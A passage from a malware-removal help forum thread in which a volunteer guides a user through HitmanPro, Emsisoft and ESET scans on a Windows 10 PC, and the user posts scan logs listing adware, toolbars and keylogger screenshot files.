  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • Attach that saved log to your next reply.

(Copy to clipboard for pasting into forum replies or tickets)

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'

 

 

STEP 2

 
1. Please download HitmanPro.

2. Launch the program by double clicking on the HitmanPro icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3. Click on the next button. You must agree with the terms of EULA. (if asked)

4. Check the box beside "No, I only want to perform a one-time scan to check this computer".

5. Click on the next button.

6. The program will start to scan the computer. The scan will typically take no more than 5 minutes.

7. When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

8. Click on the next button.

9. Click on the "Save Log" button.

10. Save that file to your desktop and post the content of that file in your next reply.

Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.
 

 

 

STEP 3
 

 

  • Download EmsisoftEmergencyKit, run the exe and extract the content in a folder of your choice like (C:\EEK) by clicking the Extract button.
  • Double-click the desktop-shortcut called Start Emsisoft Emergency Kit to start the tool.
  • Click on the "Yes" button when asked to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Click on the "Yes" button when asked to enable the scan for Potentially Unwanted Applications.
  • Next click on the Custom Scan and select only drive C:\ to be scanned and remove the rest of the drives from the list. When the scan complete, click on the View Report button (don't delete or quarantine anything).
  • Please attach the content of the report in your next reply.

 

 

STEP 4
 
 

And finally I'd like us to scan your machine with ESET OnlineScan:

  • It is recommended to turn off your antivirus program. Click on the E5rfZI9.png button to see which antivirus is currently enabled:


  • Turn off your antivirus program. See here how to do this.
  • Check the option beside: Enable detection of potentially unwanted applications.
  • Now click on Advanced Settings and make sure that the option Clean threats automatically is NOT checked, and select the following:

Enable detection of potentially unsafe applications
Enable detection of suspicious applications
Scan archives
Enable Anti-Stealth Technology

  • Click on the Change button and select only Operating memory, Autostart locations and drive C:\ to be scanned.


  • Push the dtoGjAL.png button.
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.


  • When the scan completes a list of found threats will open automatically (if any malicious files are found).


  • Push the cRhRYZ8.png button and save the file to your desktop using a unique name, such as ESETScan.txt. Include the contents of this report in your next reply.
  • Push the 9IjfdXq.png button.
  • Check the box beside RHzfZB1.png to uninstall the application when closed.
  • Push Vc3btaC.png and then close the application by clicking the X in the upper right corner.

 

 

 

and then if there aren't any issues left I'll give you my final recommendations. ;)
 
 
Regards,
Georgi




#13 captivekangaroo


Posted 15 March 2017 - 02:57 PM

All the scans have finished except for ESET Online scanner... 14 hours now. It seems to be stuck in the "operating memory" portion of the scan on the same file. The file count hasn't changed in some time but the scan time is still advancing.

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 3/14/17
Scan Time: 2:26 PM
Logfile: mbamscanlog03142017.txt
Administrator: Yes
 
-Software Information-
Version: 3.0.5.1299
Components Version: 1.0.75
Update Package Version: 1.0.1503
License: Free
 
-System Information-
OS: Windows 10
CPU: x64
File System: NTFS
User: CINDI-HP\User
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 520736
Time Elapsed: 26 min, 31 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)

 


HitmanPro 3.7.15.281
www.hitmanpro.com
 
   Computer name . . . . : CINDI-HP
   Windows . . . . . . . : 10.0.0.14393.X64/4
   User name . . . . . . : CINDI-HP\User
   UAC . . . . . . . . . : Enabled
   License . . . . . . . : Free
 
   Scan date . . . . . . : 2017-03-14 16:01:47
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 6m 50s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No
 
   Threats . . . . . . . : 3
   Traces  . . . . . . . : 260
 
   Objects scanned . . . : 2,178,665
   Files scanned . . . . : 121,895
   Remnants scanned  . . : 640,317 files / 1,416,453 keys
 
Malware _____________________________________________________________________
 
   C:\Users\User\Downloads\CouponPrinterCPS.exe
      Size . . . . . . . : 2,810,584 bytes
      Age  . . . . . . . : 620.4 days (2015-07-03 06:10:57)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 684353F97E98F278F629B1B54F1FB91B4C1CFBE284765737A4535921FB6A5CDA
      Product  . . . . . : Coupon Printer
      Publisher  . . . . : Coupons.com Incorporated
      Description  . . . : Coupon Printer Installer
      Version  . . . . . : 5.0.1.6
      Copyright  . . . . : Copyright © 2015 by Coupons.com Incorporated
      RSA Key Size . . . : 2048
      LanguageID . . . . : 1033
      Authenticode . . . : Valid
    > Bitdefender  . . . : Adware.GenericKD.3857785
      Fuzzy  . . . . . . : 101.0
 
   C:\Users\User\Downloads\PublicTransportSetup.exe
      Size . . . . . . . : 2,446,248 bytes
      Age  . . . . . . . : 1016.1 days (2014-06-02 13:01:19)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : F93B66A839839F5714C5BCBE1A2A62BF66306E053FB84F50F33760999923FF87
      Product  . . . . . : Inbox Public Transport Toolbar                              
      Publisher  . . . . : Xacti, LLC                                                  
      Description  . . . : Inbox Public Transport Toolbar Setup                        
      Version  . . . . . : 2.0.1.90
      RSA Key Size . . . : 2048
      LanguageID . . . . : 0
      Authenticode . . . : Valid
    > Kaspersky  . . . . : not-a-virus:HEUR:WebToolbar.Win32.Generic
      Fuzzy  . . . . . . : 101.0
 
   C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTDSetup.exe
      Size . . . . . . . : 11,290,808 bytes
      Age  . . . . . . . : 76.7 days (2016-12-27 23:19:34)
      Entropy  . . . . . : 8.0
      SHA-256  . . . . . : 7A0CAB9E07A8AEFAD084D0951D6DDFBB87D4A70344A7775104D3822C96DB3F60
      Product  . . . . . : YTD Video Downloader
      Description  . . . : YTD Video Downloader
      Version  . . . . . : 5.1.1
      Copyright  . . . . : Copyright © 2007-2015 GreenTree Applications SRL
      RSA Key Size . . . : 2048
      LanguageID . . . . : 1033
      Authenticode . . . : Valid
    > Kaspersky  . . . . : not-a-virus:WebToolbar.Win32.Asparnet.gen
      Fuzzy  . . . . . . : 98.0
 
 
Suspicious files ____________________________________________________________
 
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
      Size . . . . . . . : 2,424,832 bytes
      Age  . . . . . . . : 0.3 days (2017-03-14 07:37:56)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : CCAB47F4440A8DA984A082F2109AF6E983AA3AB9862302FA24D5A2EA8FCFBA58
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -126.2s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3165525.jpg
         -113.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3166973264.jpg
         -105.3s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3167947222.jpg
         -84.6s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3170334028.jpg
         -60.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3173080556.jpg
         -60.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170314.073655.416.1.etl
         -58.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{51364112-E904-4596-9E38-D3DD931B1AB3}
         -34.0s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3176200926.jpg
         -14.4s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3178469329.jpg
         -7.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{9C3E4012-B94B-425D-9B4F-FD375AED3D15}
         -6.6s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3179363426.jpg
         -3.5s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[3].htm
         -1.8s C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8CRCIXZF.cookie
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\32\260016688E7FA6A8.dat
          0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
          0.0s C:\Users\User\Desktop\FRST64.exe
          2.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\10CBD6A362EF9D8BCC73CD69DC9A48E9
          3.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\04\312C0C2FAFBD3938.dat
          6.2s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8F2TBE41\up64[1]
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3180927778.jpg
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{FDD3499E-AF66-4FBE-8977-DD4499EB64D0}
 
   C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\Y04E4WDO\FRST64[1].exe
      Size . . . . . . . : 2,424,320 bytes
      Age  . . . . . . . : 3.0 days (2017-03-11 15:59:42)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : 888080A18968475A4AF792C1F4EAED87442D61A9BD32DAAD9763CB641B5C97D9
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -9.4s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6246897801.jpg
         -2.9s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[1].htm
         -2.3s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{93AC4D83-3E24-4F5B-80C6-F5B9173A96DF}
         -2.0s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6247752199.jpg
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\45\033DAD7EB9E8FBD1.dat
         -0.3s C:\Users\User\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_556BB0FF4D382D90E7703209690E089E
         -0.3s C:\Users\User\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_556BB0FF4D382D90E7703209690E089E
          0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\Y04E4WDO\FRST64[1].exe
          1.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\F1F9908304C422C2336E772B0E2700A3
          2.3s C:\Users\User\Desktop\FRST-OlderVersion\
          3.0s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\77\56F089D219DFBA7D.dat
          3.4s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\45\45C68FBF945E49E5.dat
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42805.6248777083.jpg
          9.1s C:\Users\User\Desktop\Fixlog.txt
         15.8s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{B041CF4D-79C9-4D33-A7C4-17904D5B73BC}
 
   C:\Users\User\Desktop\FRST-OlderVersion\FRST64.exe
      Size . . . . . . . : 2,424,320 bytes
      Age  . . . . . . . : 5.1 days (2017-03-09 13:52:01)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : 888080A18968475A4AF792C1F4EAED87442D61A9BD32DAAD9763CB641B5C97D9
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -10.0s C:\ProgramData\Spyrix Free Keylogger\scr\42803.536008206.jpg
         -8.3s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5360277431.jpg
         -3.2s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5360862153.jpg
         -0.5s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5361181713.jpg
          0.0s C:\Users\User\Desktop\FRST-OlderVersion\FRST64.exe
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\47\4609A394AF14DF13.dat
          2.7s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\4\47\4609A394AF14DF13.dat
          2.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170309.125203.920.1.etl
          4.6s C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata
         13.7s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5362817708.jpg
         28.6s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5364545255.jpg
         30.1s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5364713657.jpg
         48.0s C:\ProgramData\Spyrix Free Keylogger\scr\42803.5366792477.jpg
 
   C:\Users\User\Desktop\FRST64.exe
      Size . . . . . . . : 2,424,832 bytes
      Age  . . . . . . . : 0.3 days (2017-03-14 07:37:56)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : CCAB47F4440A8DA984A082F2109AF6E983AA3AB9862302FA24D5A2EA8FCFBA58
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 24.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.
      Forensic Cluster
         -126.2s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3165525.jpg
         -113.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3166973264.jpg
         -105.3s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3167947222.jpg
         -84.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3170334028.jpg
         -60.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3173080556.jpg
         -60.9s C:\Windows\Logs\WindowsUpdate\WindowsUpdate.20170314.073655.416.1.etl
         -58.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{51364112-E904-4596-9E38-D3DD931B1AB3}
         -34.0s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3176200926.jpg
         -14.4s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3178469329.jpg
         -7.9s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{9C3E4012-B94B-425D-9B4F-FD375AED3D15}
         -6.7s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3179363426.jpg
         -3.5s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\82[3].htm
         -1.8s C:\Users\User\AppData\Local\Microsoft\Windows\INetCookies\8CRCIXZF.cookie
         -0.8s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\32\260016688E7FA6A8.dat
         -0.0s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8HDYPBSD\FRST64[1].exe
          0.0s C:\Users\User\Desktop\FRST64.exe
          2.0s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store\10CBD6A362EF9D8BCC73CD69DC9A48E9
          3.1s C:\ProgramData\Microsoft\Windows Defender\Scans\MetaStore\1\04\312C0C2FAFBD3938.dat
          6.1s C:\Users\User\AppData\Local\Microsoft\Windows\INetCache\IE\8F2TBE41\up64[1]
          6.9s C:\ProgramData\Spyrix Free Keylogger\scr\42808.3180927778.jpg
          9.1s C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{FDD3499E-AF66-4FBE-8977-DD4499EB64D0}
 
 
Potential Unwanted Programs _________________________________________________
 
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Cache\filelist (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\feed4.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_p_c.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_sres.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Data\default\us_yb_c.data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\bkm_add_2_s0.gif (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\finance_r.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\flickr_refresh2.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\mail_refresh_new_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\e\mail_refresh_new_s1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\food_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\app_hover_2014.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2_h.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\arrow-app-2_p.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\bookmarks_r_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\bookmarks_r_s1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\droparrow.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\droparrow_h.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\h_1.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\new-yahoo-logo.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\news_refresh_new.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\g\ylive_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\horoscope.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\movies_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\rss_metro12_1.gif (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\tech_png.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\visi\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo! Companion\Icons\visi\tb_coup2_s0.png (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\ (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\data (YahooToolbar)
   C:\Users\User\AppData\LocalLow\Yahoo!\Companion\resources (YahooToolbar)
   HKLM\SOFTWARE\Classes\f\ (Funmoods)
   HKLM\SOFTWARE\Conduit\ (Conduit)
 
Cookies _____________________________________________________________________
 
 
 
 
Emsisoft Emergency Kit - Version 2017.2
Last update: 3/14/2017 4:21:33 PM
User account: CINDI-HP\User
Computer name: CINDI-HP
OS version: Windows 10x64 
 
Scan settings:
 
Scan type: Custom Scan
Objects: Rootkits, Memory, Traces, C:\
 
Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Direct disk access: Off
 
Scan start: 3/14/2017 4:24:32 PM
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CONDUIT detected: Application.InstallAd (A) [270275]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CONDUIT detected: Application.InstallAd (A) [270275]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\F detected: Application.AdReg (A) [271742]
C:\Program Files (x86)\Freemake\Freemake Video Converter\SetupUpdate.exe detected: Application.AdLoad (A) [282988]
C:\Users\User\Downloads\Andy_46.16_58.exe detected: Application.AdInstall (A) [285134]
C:\Users\User\Downloads\CouponPrinter.exe detected: Application.AdOffer (A) [285399]
C:\Users\User\Downloads\CouponPrinterCPS.exe detected: Application.AdOffer (A) [285399]
C:\Users\User\Downloads\cpu-z_1.64-setup-en.exe -> (Instyler o) -> (Instyler Module 5) detected: Application.Toolbar (A) [282788]
C:\Users\User\Downloads\PublicTransportSetup.exe detected: Application.InstallBox (A) [281859]
C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch.zip -> YTD Video Downloader Pro 5.1.1.0.1 Incl Patch/YTDSetup.exe -> (NSIS o) -> lzma_solid_nsis0007 detected: Application.Toolbar (A) [282788]
C:\Users\User\Downloads\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTD Video Downloader Pro 5.1.1.0.1 Incl Patch\YTDSetup.exe -> (NSIS o) -> lzma_solid_nsis0007 detected: Application.Toolbar (A) [282788]
 
Scanned 457371
Found 14
 
Scan end: 3/14/2017 6:11:55 PM
Scan time: 1:47:23
 
I just re-read your instructions and noticed that I neglected to turn off my antivirus (Windows Defender) prior to running the ESET Online scan. I tried to stop the scan, hoping that it would trigger the application to finish the scan so I could at least view the results. (Note: it had found 32 infections so far.) Even after a lengthy wait, it wouldn't stop scanning, though it did say that STOP SCAN was initiated. So I used Task Manager to stop the scan, but no results were available. I then disabled the antivirus and ran it again. Hopefully it won't take as long but as soon as it does, I will post results.

Edited by captivekangaroo, 15 March 2017 - 03:00 PM.


#14 B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts

Posted 15 March 2017 - 06:29 PM

Hi,

Thank you for the update. The logs are clean and the detected files are safe as long as you are careful with the check boxes that appear during the install and avoid installing unwanted applications or toolbars. You can install Unchecky to make sure that the check boxes will remain clean when you install new software.

Let me see the last log and then I can post my final advice. :)

Regards,

Georgi




#15 captivekangaroo

  • Topic Starter

  • Members
  • 11 posts

Posted 16 March 2017 - 11:40 AM

Georgi, 

The ESET scan is still running (21 hours 35 min.) but once again it's stuck on one file. It says 32 files infected, 453,955 files scanned. That file number has not changed in 15 hours. I am going to try stopping it again and see if it will generate a log. Is this ok? I'll wait for your reply.





